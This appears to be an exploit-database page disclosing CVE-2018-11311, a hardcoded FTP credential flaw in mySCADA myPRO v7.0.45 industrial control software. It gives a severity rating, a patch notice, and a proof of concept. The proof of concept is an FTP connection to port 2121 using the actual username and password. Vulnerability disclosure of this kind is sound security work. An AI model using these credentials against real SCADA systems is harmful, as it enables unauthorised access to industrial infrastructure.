header-logo
Suggest Exploit
vendor:
myPRO
by:
Emre ÖVÜNÇ
9.1
CVSS
CRITICAL
Hardcoded Credentials
798
CWE
Product Name: myPRO
Affected Version From: v7.0.45
Affected Version To: v7.0.45
Patch Exists: YES
Related CWE: CVE-2018-11311
CPE: myscada:mypro
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows/Linux
2018

mySCADA myPRO v7 Hardcoded Credentials

mySCADA myPRO v7 contains hardcoded FTP credentials which can be used to gain access to the system. The credentials are 'myscada' for the username and 'Vikuk63' for the password.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of mySCADA myPRO v7.
Source

Exploit-DB raw data:

# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials
# Date: 2018-07-02
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://myscada.org
# Software Link: https://www.myscada.org/mypro/
# Version: v7.0.45
# Tested on: Windows/Linux
# CVE-2018-11311
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password

# PoC

ftp [IP] 2121

username: myscada

password: Vikuk63

Navigation

Suggest Exploit

Services By CQR